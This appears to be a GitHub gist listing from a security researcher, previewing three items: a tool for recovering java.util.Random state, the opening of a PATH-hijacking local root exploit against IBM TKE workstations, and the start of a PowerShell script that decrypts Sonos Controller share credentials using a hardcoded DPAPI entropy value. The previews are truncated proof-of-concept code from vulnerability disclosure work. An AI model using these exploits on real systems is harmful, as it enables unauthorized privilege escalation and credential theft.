Yorick Koster ykoster

ykoster / mordan.c
Created Jun 4, 2019
Mordan is a program that can be used to determine the internal state of the java.util.Random() random number generator
/* ---------------------------------------------------------------------
* mordan.c
* revision 0.4
* ---------------------------------------------------------------------
* November 2005, Yorick Koster, ITsec Security Services
* ---------------------------------------------------------------------
* Mordan is a program that can be used to determine the internal state
* of the java.util.Random() random number generator. In order to do so,
* mordan requires two integer values (created with Random.nextInt())
* or one long value (created with Random.nextLong()).
ykoster / gotroot.sh
Created Mar 31, 2019
IBM Trusted Key Entry (TKE) workstation local privilege escalation
#!/bin/bash
OLDPATH=$PATH
trap cleanup EXIT
export PATH=.:$PATH
/bin/cat > $HOME/iptables << __EOF
#!/bin/bash
/bin/su -c /usr/bin/xterm
__EOF
ykoster / SonosController.ps1
Last active Apr 3, 2019
Sonos Controller for Windows ShareConfig.xml weak file permissions
# load System.Security for HMAC-SHA256
Add-Type -AssemblyName System.Security
$ip = "127.0.0.1"
$port = 3445
$configPath = "$env:ProgramData\Sonos,_Inc\runtime\ShareConfig.xml"
$sharePath = "$env:windir\media"
# the entropy value is hardcoded in the service and used for encrypting and decrypting the password of the Sonos user (DPAPI)
$entropy = [System.Text.Encoding]::Unicode.GetBytes("e51bd1fb-2783-4261-95b8-027afc69e8af");